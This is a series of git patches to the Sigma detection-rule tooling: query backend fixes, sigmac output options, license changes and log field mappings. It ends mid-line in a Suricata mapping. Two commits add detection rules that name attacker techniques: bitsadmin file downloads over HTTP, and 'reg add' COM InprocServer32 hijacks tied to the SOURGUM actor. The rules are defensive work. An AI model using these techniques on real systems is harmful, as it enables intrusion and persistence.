From 47bd41f0125a82972319d51d04cf6c88da46ed02 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 18 Jan 2021 05:55:12 -0500 Subject: [PATCH 0001/1367] revert commented line --- tools/sigma/backends/elasticsearch.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index a0c80dae..6c4a9537 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -216,7 +216,7 @@ class ElasticsearchWildcardHandlingMixin(object): """ if value and not value == 'null' and not re.match(r'^/.*/$', value) and (re.search('[a-zA-Z]', value) and not re.match(self.uuid_regex, value) or self.containsWildcard(value)): # re.search for alpha is fastest: # Turn single ending '\\' into non escaped (ie: '\\*') - #value = re.sub( r"((?\\*", value ) + value = re.sub( r"((?\\*", value ) # Make upper/lower value = re.sub( r"[A-Za-z]", lambda x: "[" + x.group( 0 ).upper() + x.group( 0 ).lower() + "]", value ) # Turn `.` into wildcard, only if odd number of '\'(because this would mean already escaped) From caf65869285accb34807cb598850bf58f16a8f7b Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 18 Jan 2021 06:49:57 -0500 Subject: [PATCH 0002/1367] Add logic to NOT quote an analyzed field if it contains wildcard, things such as '*' get treated as an exact match Signed-off-by: Nate Guagenti --- tools/sigma/backends/elasticsearch.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 6c4a9537..1c8ab23b 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -269,8 +269,11 @@ class ElasticsearchQuerystringBackend(DeepFieldMappingMixin, ElasticsearchWildca if make_ci.get('is_regex'): # Determine if still should be a regex result = "/%s/" % result # Regex place holders for regex return result - else: - return "\"%s\"" % result + else: # If analyzed field contains wildcard then do NOT quote otherwise things such as '*' get treated as an exact match + if self.containsWildcard(result): + return result + else: + return "\"%s\"" % result def generateNOTNode(self, node): expression = super().generateNode(node.item) From 36656c3facb2f149cb5ed30e5a06cf27c49d81cf Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 18 Jan 2021 07:01:50 -0500 Subject: [PATCH 0003/1367] Add to ElasticsearchDSLBackend the logic to NOT quote an analyzed field if it contains wildcard, things such as '*' get treated as an exact match Signed-off-by: Nate Guagenti --- tools/sigma/backends/elasticsearch.py | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 1c8ab23b..a5b6f3f2 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -421,8 +421,12 @@ class ElasticsearchDSLBackend(DeepFieldMappingMixin, RulenameCommentMixin, Elast queryType = 'wildcard' value_cleaned = self.escapeSlashes(self.cleanValue(str(v))) else: - queryType = 'match_phrase' - value_cleaned = self.cleanValue(str(v)) + if self.containsWildcard(str(v)): + queryType = 'wildcard' + value_cleaned = self.escapeSlashes(self.cleanValue(str(v))) + else: + queryType = 'match_phrase' + value_cleaned = self.cleanValue(str(v)) res['bool']['should'].append({queryType: {key_mapped: value_cleaned}}) return res elif value is None: @@ -442,8 +446,12 @@ class ElasticsearchDSLBackend(DeepFieldMappingMixin, RulenameCommentMixin, Elast queryType = 'wildcard' value_cleaned = self.escapeSlashes(self.cleanValue(str(value))) else: - queryType = 'match_phrase' - value_cleaned = self.cleanValue(str(value)) + if self.containsWildcard(str(value)): + queryType = 'wildcard' + value_cleaned = self.escapeSlashes(self.cleanValue(str(value))) + else: + queryType = 'match_phrase' + value_cleaned = self.cleanValue(str(value)) return {queryType: {key_mapped: value_cleaned}} elif isinstance(value, SigmaRegularExpressionModifier): key_mapped = self.fieldNameMapping(key, value) From 528be5977cb686e9444b19db126449d7bb4dd12f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 14 May 2021 12:53:42 +0200 Subject: [PATCH 0004/1367] Update LICENSE.Detection.Rules.md --- LICENSE.Detection.Rules.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/LICENSE.Detection.Rules.md b/LICENSE.Detection.Rules.md index 2b801890..6475b151 100644 --- a/LICENSE.Detection.Rules.md +++ b/LICENSE.Detection.Rules.md @@ -1,4 +1,4 @@ -# Detection Rule License (DRL) 1.0 +# Detection Rule License (DRL) 1.1 Permission is hereby granted, free of charge, to any person obtaining a copy of this rule set and associated documentation files (the "Rules"), to deal in the Rules without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Rules, and to permit persons to whom the Rules are furnished to do so, subject to the following conditions: @@ -10,4 +10,8 @@ If you share the Rules (including in modified form), you must retain the followi 3. indicate the Rules are licensed under this Detection Rule License, and include the text of, or the URI or hyperlink to, this Detection Rule License to the extent reasonably practicable +If you use the Rules (including in modified form) on data, messages based on matches with the Rules must retain the following if it is supplied within the Rules: + +1. identification of the authors(s) ("author" field) of the Rule and any others designated to receive attribution, in any reasonable manner requested by the Rule author (including by pseudonym if designated). + THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES. \ No newline at end of file From 900263315a7606fd1de6b93743e88f548c903c1d Mon Sep 17 00:00:00 2001 From: Markku Parviainen Date: Sat, 12 Jun 2021 23:09:22 +0300 Subject: [PATCH 0005/1367] Added support for free-text search in logsources configuration, enabling usage of splunk macros and ability to optimize the resulting searches. --- tools/config/splunk-windows.yml | 7 +++++++ tools/sigma/backends/base.py | 10 ++++++++++ tools/sigma/configuration.py | 10 ++++++++++ tools/sigma/parser/condition.py | 6 ++++++ tools/sigma/parser/rule.py | 7 ++++++- 5 files changed, 39 insertions(+), 1 deletion(-) diff --git a/tools/config/splunk-windows.yml b/tools/config/splunk-windows.yml index 7b02728d..4d5bdecf 100644 --- a/tools/config/splunk-windows.yml +++ b/tools/config/splunk-windows.yml @@ -24,6 +24,13 @@ logsources: service: sysmon conditions: source: 'WinEventLog:Microsoft-Windows-Sysmon/Operational' + windows-process-creation: + product: windows + service: sysmon + category: process_creation + # Optimized search for process creation, being dramatically faster than EventCode=1 search, as 'ParentProcessGuid' is more unique than '1' in the raw data. + # This also supports custom splunk macros. + search: '`example_splunk_macro_for_sysmon` ParentProcessGuid' windows-powershell: product: windows service: powershell diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index e9901e06..be15955c 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -169,6 +169,8 @@ class BaseBackend: return self.applyOverrides(self.generateNotNULLValueNode(node)) elif type(node) == sigma.parser.condition.NodeSubexpression: return self.applyOverrides(self.generateSubexpressionNode(node)) + elif type(node) == sigma.parser.condition.SigmaSearchValueAsIs: + return self.generateValueAsIsNode(node) elif type(node) == tuple: return self.applyOverrides(self.generateMapItemNode(node)) elif type(node) in (str, int): @@ -180,6 +182,9 @@ class BaseBackend: else: raise TypeError("Node type %s was not expected in Sigma parse tree" % (str(type(node)))) + def generateValueAsIsNode(self, node): + raise NotImplementedError("Node type not implemented for this backend") + def generateANDNode(self, node): raise NotImplementedError("Node type not implemented for this backend") @@ -248,6 +253,11 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): sort_condition_lists = False # Sort condition items for AND and OR conditions + def generateValueAsIsNode(self, node): + if type(node.value) is list: + return self.listExpression % (self.listSeparator.join(node.value)) + return self.listExpression % node.value + def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] filtered = [ g for g in generated if g is not None ] diff --git a/tools/sigma/configuration.py b/tools/sigma/configuration.py index 826775d8..613f3121 100644 --- a/tools/sigma/configuration.py +++ b/tools/sigma/configuration.py @@ -160,6 +160,7 @@ class SigmaConfiguration: class SigmaLogsourceConfiguration: """Contains the definition of a log source""" def __init__(self, logsource=None, defaultindex=None): + self.search = [] if logsource == None: # create empty object self.merged = False self.category = None @@ -210,6 +211,8 @@ class SigmaLogsourceConfiguration: else: raise TypeError("Default index must be string or list of strings") + self.search = [ ls.search for ls in logsource if ls.search ] + self.conditions = [ ls.conditions for ls in logsource if ls.conditions ] # build list of list of (field, value) tuples as base for merged query condition. elif type(logsource) == dict: # create logsource configuration from parsed yaml self.merged = False @@ -260,6 +263,13 @@ class SigmaLogsourceConfiguration: # from a merge, where default index handling applies. self.index = [] + # free-form text search as-is. Instead of key=value, the value of 'search' is directly the value itself. Appended to conditions. + search = logsource.get('search', None) + if search not in [None, '']: + if type(search) != str: + raise SigmaConfigParseError("search field must be a string: " + repr(search)) + self.search.append(logsource.get('search', '')) + try: if type(logsource['conditions']) != dict: raise SigmaConfigParseError("Logsource conditions must be a map") diff --git a/tools/sigma/parser/condition.py b/tools/sigma/parser/condition.py index a4c908cc..644e2481 100644 --- a/tools/sigma/parser/condition.py +++ b/tools/sigma/parser/condition.py @@ -260,6 +260,12 @@ class NodeSubexpression(ParseTreeNode): self.items = subexpr +class SigmaSearchValueAsIs: + """The contained value is used as-is in the output.""" + def __init__(self, value): + self.value = value + + # Parse tree generators: generate parse tree nodes from extended conditions def generateXOf(sigma, val, condclass): """ diff --git a/tools/sigma/parser/rule.py b/tools/sigma/parser/rule.py index 763beaf5..50a4b321 100644 --- a/tools/sigma/parser/rule.py +++ b/tools/sigma/parser/rule.py @@ -16,7 +16,7 @@ import re from .exceptions import SigmaParseError -from .condition import SigmaConditionTokenizer, SigmaConditionParser, ConditionAND, ConditionOR, ConditionNULLValue +from .condition import SigmaConditionTokenizer, SigmaConditionParser, ConditionAND, ConditionOR, ConditionNULLValue, SigmaSearchValueAsIs from .modifiers import apply_modifiers class SigmaParser: @@ -168,4 +168,9 @@ class SigmaParser: else: # only one index, add directly to AND from above cond.add((index_field, indices[0])) + # Add free-text search condition, expressed in the configuration as 'search' field. + if len(logsource.search) > 0: + for item in logsource.search: + cond.add(SigmaSearchValueAsIs(item)) + return cond From 0e7ad2bac852c5467d18197b6b17fd397b7fa801 Mon Sep 17 00:00:00 2001 From: Markku Parviainen Date: Wed, 16 Jun 2021 14:51:18 +0300 Subject: [PATCH 0006/1367] small change to splunk logsource config --- tools/config/splunk-windows.yml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/tools/config/splunk-windows.yml b/tools/config/splunk-windows.yml index 4d5bdecf..40e86484 100644 --- a/tools/config/splunk-windows.yml +++ b/tools/config/splunk-windows.yml @@ -28,9 +28,14 @@ logsources: product: windows service: sysmon category: process_creation - # Optimized search for process creation, being dramatically faster than EventCode=1 search, as 'ParentProcessGuid' is more unique than '1' in the raw data. - # This also supports custom splunk macros. - search: '`example_splunk_macro_for_sysmon` ParentProcessGuid' + # Optimized search for process creation, being dramatically faster in Lispy than just EventCode=1 search, as 'ParentProcessGuid' is more unique than '1' in the raw data. + # This also supports custom splunk macros, just like they are written in splunk (i.e. as `macro`), minding that it has to be written inside the string quotes here. + search: 'ParentProcessGuid EventCode=1' + windows-process-creation: + product: windows + service: sysmon + category: file_creation + search: 'TargetFilename EventCode=11' windows-powershell: product: windows service: powershell From ab3a54c336d5328c97dfc81d45735affb1d5102e Mon Sep 17 00:00:00 2001 From: Cody Swanson Date: Sun, 27 Jun 2021 12:08:45 -0700 Subject: [PATCH 0007/1367] Update Elasticsearch Watcher backend to populate name field in alert metadata --- tools/sigma/backends/elasticsearch.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 855e8815..db14cce6 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1038,7 +1038,7 @@ class XPackWatcherBackend(ElasticsearchQuerystringBackend, MultiRuleOutputMixin) iaction = { "elastic":{ "transform":{ #adding title, description, tags on the event - "script": "ctx.payload.transform = [];for (int j=0;j Date: Mon, 28 Jun 2021 19:27:20 +0200 Subject: [PATCH 0008/1367] Add a way to have a output prefix --- tools/sigma/sigmac.py | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 5d50a373..4608acfb 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -216,17 +216,30 @@ def main(): backend = backend_class(sigmaconfigs, backend_options) filename = cmdargs.output + fileprefix = None if filename: - try: - out = open(filename, "w", encoding='utf-8') - except (IOError, OSError) as e: - print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) + if filename[-1:] == '_': + fileprefix = filename + else: + try: + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) else: out = sys.stdout error = 0 for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse): + if fileprefix : + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml','.rule') # add a option to extension ? + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) + logger.debug("* Processing Sigma input %s" % (sigmafile)) try: if cmdargs.inputs == ['-']: From b26fc228b4a662699b143f1e97ba877eab92ac80 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 28 Jun 2021 21:25:51 +0200 Subject: [PATCH 0009/1367] update help and add '/' or '\\' for surfix --- tools/sigma/sigmac.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 4608acfb..7262c515 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -102,7 +102,7 @@ def set_argparser(): argparser.add_argument("--target", "-t", choices=backends.getBackendDict().keys(), help="Output target format") argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.") - argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix if multiple files are generated") + argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\') if multiple files are generated") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") argparser.add_argument("--backend-config", "-C", help="Configuration file (YAML format) containing options to pass to the backend") @@ -218,7 +218,7 @@ def main(): filename = cmdargs.output fileprefix = None if filename: - if filename[-1:] == '_': + if filename[-1:] in ['_','/','\\']: fileprefix = filename else: try: From bb8fe7f3b8b512934216343a9769e8436ef2269d Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 29 Jun 2021 08:13:48 +0200 Subject: [PATCH 0010/1367] Add `--output-extention` if you want a custom output file extention (.ndjson,.txt,.splunk,..) --- tools/sigma/sigmac.py | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 7262c515..bfca7c06 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -102,7 +102,8 @@ def set_argparser(): argparser.add_argument("--target", "-t", choices=backends.getBackendDict().keys(), help="Output target format") argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.") - argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\') if multiple files are generated") + argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\')") + argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") argparser.add_argument("--backend-config", "-C", help="Configuration file (YAML format) containing options to pass to the backend") @@ -135,7 +136,6 @@ def list_modifiers(modifiers): def main(): argparser = set_argparser() cmdargs = argparser.parse_args() - scm = SigmaConfigurationManager() logger = logging.getLogger(__name__) @@ -214,10 +214,19 @@ def main(): backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) backend = backend_class(sigmaconfigs, backend_options) - + + filename_ext = cmdargs.output_extention filename = cmdargs.output fileprefix = None if filename: + if filename_ext: + if filename_ext[0] == '.': + pass + else: + filename_ext = '.' + filename_ext + else: + filename_ext = '.rule' + if filename[-1:] in ['_','/','\\']: fileprefix = filename else: @@ -234,7 +243,7 @@ def main(): if fileprefix : try: filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml','.rule') # add a option to extension ? + filename = filename.replace('.yml',filename_ext) out = open(filename, "w", encoding='utf-8') except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) From f2b24ea6a37ce7eab3718aa444721b41044b150b Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 29 Jun 2021 17:45:59 +0200 Subject: [PATCH 0011/1367] Add support for action yml --- tools/sigma/sigmac.py | 35 +++++++++++++++++++++++++---------- 1 file changed, 25 insertions(+), 10 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index bfca7c06..50196933 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -240,15 +240,6 @@ def main(): error = 0 for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse): - if fileprefix : - try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml',filename_ext) - out = open(filename, "w", encoding='utf-8') - except (IOError, OSError) as e: - print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) - logger.debug("* Processing Sigma input %s" % (sigmafile)) try: if cmdargs.inputs == ['-']: @@ -257,10 +248,34 @@ def main(): f = sigmafile.open(encoding='utf-8') parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile) results = parser.generate(backend) - + + nb_result = len(list(parser.generate(backend))) + if nb_result > 1 : + inc_filenane = 0 + else: + inc_filenane = None + newline_separator = '\0' if cmdargs.print0 else '\n' for result in results: + if not fileprefix == None and not inc_filenane == None: #yml action + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml','_' + str(inc_filenane) + filename_ext) + inc_filenane += 1 + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) + elif not fileprefix == None and inc_filenane == None: # a simple yml + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml',filename_ext) + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) print(result, file=out, end=newline_separator) + except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) error = ERR_OPEN_SIGMA_RULE From 7b001b6b91b76a555837a3c8af2a35c77d7369da Mon Sep 17 00:00:00 2001 From: Denny Lin Date: Thu, 15 Jul 2021 18:04:08 +0800 Subject: [PATCH 0012/1367] Fix issue [ADA] Convesion of wildcard not as expected for ada backend. #1689 --- tools/sigma/backends/ala.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py index c053004e..2489a7bb 100644 --- a/tools/sigma/backends/ala.py +++ b/tools/sigma/backends/ala.py @@ -119,10 +119,13 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): elif val.startswith("*") or val.endswith("*"): if val.startswith("*") and val.endswith("*"): op = "contains" + val = val[1:-1] elif val.startswith("*"): op = "endswith" + val = val[1:] elif val.endswith("*"): op = "startswith" + val = val[:-1] val = re.sub('([".^$]|(?![*?]))', '\g<1>', val) val = re.sub('(\\\\\*|\*)', '', val) val = re.sub('\\?', '.', val) From f9997ace537eb1d51f83c37431fc2368ccb1afb2 Mon Sep 17 00:00:00 2001 From: matsto Date: Thu, 15 Jul 2021 16:58:09 +0200 Subject: [PATCH 0013/1367] Fixed transformation modifier for keywords --- rules/windows/builtin/win_susp_msmpeng_crash.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml index 15b527e7..6e240550 100644 --- a/rules/windows/builtin/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml @@ -23,7 +23,7 @@ detection: Source: 'Windows Error Reporting' EventID: 1001 keywords: - Message|contains: + Message|contains|all: - 'MsMpEng.exe' - 'mpengine.dll' condition: 1 of selection* and keywords From ce0d84acd7c09c59c693e3bfe017199cf83b0ee1 Mon Sep 17 00:00:00 2001 From: Ibrahim Ali Khan Date: Thu, 15 Jul 2021 21:51:41 +0500 Subject: [PATCH 0014/1367] Create ala-azure-aws_cloudtrail.yml AWS CloudTrail Logs mapping for Azure Log Analytics --- tools/config/ala-azure-aws_cloudtrail.yml | 46 +++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 tools/config/ala-azure-aws_cloudtrail.yml diff --git a/tools/config/ala-azure-aws_cloudtrail.yml b/tools/config/ala-azure-aws_cloudtrail.yml new file mode 100644 index 00000000..b84f5fdf --- /dev/null +++ b/tools/config/ala-azure-aws_cloudtrail.yml @@ -0,0 +1,46 @@ +title: AWS CloudTrail Logs mapping for Azure Log Analytics +order: 20 +backends: + - ala + - ala-rule +fieldmappings: + additionalEventdata: AdditionalEventData + apiVersion: APIVersion + awsRegion: AWSRegion + errorCode: ErrorCode + errorMessage: ErrorMessage + eventID: AwsEventId + eventName: EventName + eventSource: EventSource + eventTime: TimeGenerated + eventType: EventTypeName + eventVersion: EventVersion + managementEvent: ManagementEvent + readOnly: ReadOnly + recipientAccountId: RecipientAccountId + requestID: AwsRequestId_ + requestParameters: RequestParameters + responseElements: ResponseElements + serviceEventDetails: ServiceEventDetails + sourceIPAddress: SourceIpAddress + userAgent: UserAgent + userIdentity.accessKeyId: UserIdentityAccessKeyId + userIdentity.accountId: UserIdentityAccountId + userIdentity.arn: UserIdentityArn + userIdentity.invokedBy: UserIdentityInvokedBy + userIdentity.principalId: UserIdentityPrincipalid + userIdentity.sessionContext.attributes.creationDate: SessionCreationDate + userIdentity.sessionContext.attributes.mfaAuthenticated: SessionMfaAuthenticated + userIdentity.sessionContext.sessionIssuer.userName: SessionIssuerUserName + userIdentity.sessionContext.sessionIssuer.type: SessionIssuerType + userIdentity.sessionContext.sessionIssuer.principalId: SessionIssuerPrincipalId + userIdentity.sessionContext.sessionIssuer.arn: SessionIssuerArn + userIdentity.sessionContext.sessionIssuer.accountId: SessionIssuerAccountId + userIdentity.type: UserIdentityType + userIdentity.userName: UserIdentityUserName + vpcEndpointId: VpcEndpointId +overrides: + - field: ErrorCode + value: 999999 + regexes: + - (ErrorCode contains \'\') From 1cb631017a04479777158f5e4ec9266a6ea39a2f Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Fri, 16 Jul 2021 14:13:48 +0700 Subject: [PATCH 0015/1367] Suspicious behaviours related to SOURGUM --- .../process_creation/sysmon_apt_sourgrum.yml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_apt_sourgrum.yml diff --git a/rules/windows/process_creation/sysmon_apt_sourgrum.yml b/rules/windows/process_creation/sysmon_apt_sourgrum.yml new file mode 100644 index 00000000..661a20dd --- /dev/null +++ b/rules/windows/process_creation/sysmon_apt_sourgrum.yml @@ -0,0 +1,43 @@ +title: SOURGUM Actor Behaviours +id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd +description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM +author: + - MSTIC + - FPT.EagleEye +status: experimental +level: high +references: + - sha256=c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/SOURGUM_IOC.yaml + - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ +date: 2021/06/15 +tags: + - attack.t1546 + - attack.t1546.015 + - attack.persistence + - attack.privilege_escalation +logsource: + category: process_creation + product: sysmon +detection: + selection1: + Image|contains: 'windows\system32\Physmem.sys' + selection2: + Image|contains: + - 'Windows\system32\ime\SHARED\WimBootConfigurations.ini' + - 'Windows\system32\ime\IMEJP\WimBootConfigurations.ini' + - 'Windows\system32\ime\IMETC\WimBootConfigurations.ini' + selection3: + Image|contains: + - 'windows\system32\filepath2' + - 'windows\system32\ime' + registry_command: + CommandLine|contains: + - 'reg add' + registry_key: + CommandLine|contains: + - 'HKEY_LOCAL_MACHINE\software\classes\clsid\{7c857801-7381-11cf-884d-00aa004b2e24}\inprocserver32' + - 'HKEY_LOCAL_MACHINE\software\classes\clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\inprocserver32' + condition: selection1 or selection2 or (selection3 and registry_command and registry_key) +falsepositives: + - Unknown From 8effde4e1d98bcb4912be04cd09515fadb490879 Mon Sep 17 00:00:00 2001 From: Tran Trung Hieu Date: Fri, 16 Jul 2021 16:40:00 +0700 Subject: [PATCH 0016/1367] More suspicious flag fot bitsadmin execution --- .../win_process_creation_bitsadmin_download.yml | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml index 4cbadca4..f6c8a5fb 100644 --- a/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml +++ b/rules/windows/process_creation/win_process_creation_bitsadmin_download.yml @@ -5,6 +5,7 @@ description: Detects usage of bitsadmin downloading a file references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 + - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ tags: - attack.defense_evasion - attack.persistence @@ -12,8 +13,10 @@ tags: - attack.s0190 - attack.t1036.003 date: 2017/03/09 -modified: 2020/09/06 -author: Michael Haag +modified: 2021/07/16 +author: + - Michael Haag + - FPT.EagleEye logsource: category: process_creation product: windows @@ -21,12 +24,20 @@ detection: selection1: Image|endswith: - '\bitsadmin.exe' + susp_flag_1: CommandLine|contains: - ' /transfer ' + susp_flag_2: + CommandLine|contains: + - ' /create ' + - ' /addfile ' + http_flag: + CommandLine|contains: + - 'http' selection2: CommandLine|contains: - 'copy bitsadmin.exe' - condition: selection1 or selection2 + condition: (selection1 and susp_flag_2 and http_flag) or (selection1 and susp_flag_1) or selection2 fields: - CommandLine - ParentCommandLine From 7c6ef062c5bf2df8fe0c7848656675698a670d70 Mon Sep 17 00:00:00 2001 From: Ibrahim Ali Khan Date: Fri, 16 Jul 2021 23:08:03 +0500 Subject: [PATCH 0017/1367] Create ala-suricata.yml Suricata logs mapping for Azure Log Analytics added --- tools/config/ala-suricata.yml | 52 +++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 tools/config/ala-suricata.yml diff --git a/tools/config/ala-suricata.yml b/tools/config/ala-suricata.yml new file mode 100644 index 00000000..fd3a69ec --- /dev/null +++ b/tools/config/ala-suricata.yml @@ -0,0 +1,52 @@ +title: Suricata logs mapping for Azure Log Analytics +order: 20 +backends: + - ala + - ala-rule +fieldmappings: + timestamp: parse_json(RawData).timestamp + flow_id: parse_json(RawData).flow_id + in_iface: parse_json(RawData).in_iface + event_type: parse_json(RawData).event_type + src_ip: parse_json(RawData).src_ip + src_port: parse_json(RawData).src_port + dest_ip: parse_json(RawData).dest_ip + dest_port: parse_json(RawData).dest_port + proto: parse_json(RawData).proto + tx_id: parse_json(RawData).tx_id + alert.action: parse_json(RawData).alert.action + alert.gid: parse_json(RawData).alert.gid + alert.signature_id: parse_json(RawData).alert.signature_id + alert.rev: parse_json(RawData).alert.rev + alert.signature: parse_json(RawData).alert.signature + alert.category: parse_json(RawData).alert.category + alert.severity: parse_json(RawData).alert.severity + alert.metadata.updated_at: parse_json(RawData).alert.metadata.updated_at + alert.metadata.created_at: parse_json(RawData).alert.metadata.created_at + alert.metadata.cve: parse_json(RawData).alert.metadata.cve + suricata.eve.alert.metadata.cve: parse_json(RawData).alert.metadata.cve + alert.metadata.signature_severity: parse_json(RawData).alert.metadata.signature_severity + alert.metadata.deployment: parse_json(RawData).alert.metadata.deployment + alert.metadata.tag: parse_json(RawData).alert.metadata.tag + suricata.eve.alert.metadata.tag: parse_json(RawData).alert.metadata.tag + alert.metadata.attack_target: parse_json(RawData).alert.metadata.attack_target + alert.metadata.affected_product: parse_json(RawData).alert.metadata.affected_product + dns.query: parse_json(RawData).dns.query + app_proto: parse_json(RawData).app_proto + flow.pkts_toserver: parse_json(RawData).flow.pkts_toserver + flow.pkts_toclient: 